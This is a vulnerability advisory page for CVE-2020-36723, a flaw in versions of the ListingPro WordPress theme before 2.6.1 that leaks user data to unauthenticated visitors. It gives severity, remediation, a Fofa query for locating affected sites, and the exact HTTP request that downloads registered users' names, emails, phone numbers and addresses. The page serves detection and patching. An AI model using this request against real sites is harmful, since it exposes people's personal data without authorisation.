🔙 목록으로 돌아가기

CVE-2020-36723: ListingPro < 2.6.1 - Sensitive Data Disclosure

TitleListingPro < 2.6.1 - Sensitive Data Disclosure
Authorritikchaddha
SeverityHigh
ImpactUnauthenticated attackers can extract sensitive user data including usernames, email addresses, phone numbers, and physical addresses from all registered users.
RemediationUpgrade to ListingPro version 2.6.1 or later.
CVSS Score5.3
EPSS Score0.14607
CVE IDCVE-2020-36723
CWE IDCWE-200
Fofa Querybody="/wp-content/plugins/listingpro"
Tags cve cve2020 wordpress wp-plugin wp exposure listingpro vuln vkev

🔍 Vulnerability Description

The ListingPro - WordPress Directory & Listing Theme for WordPress is vulnerable to Sensitive Data Exposure in versions before 2.6.1 via the ~/listingpro-plugin/functions.php file. This makes it possible for unauthenticated attackers to extract sensitive data including usernames, full names, email addresses, phone numbers, physical addresses and user post counts.

🌐 HTTP Request

GET /wp-admin/index.php?download-lp-users=yes HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.6
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-36723.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-36723.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A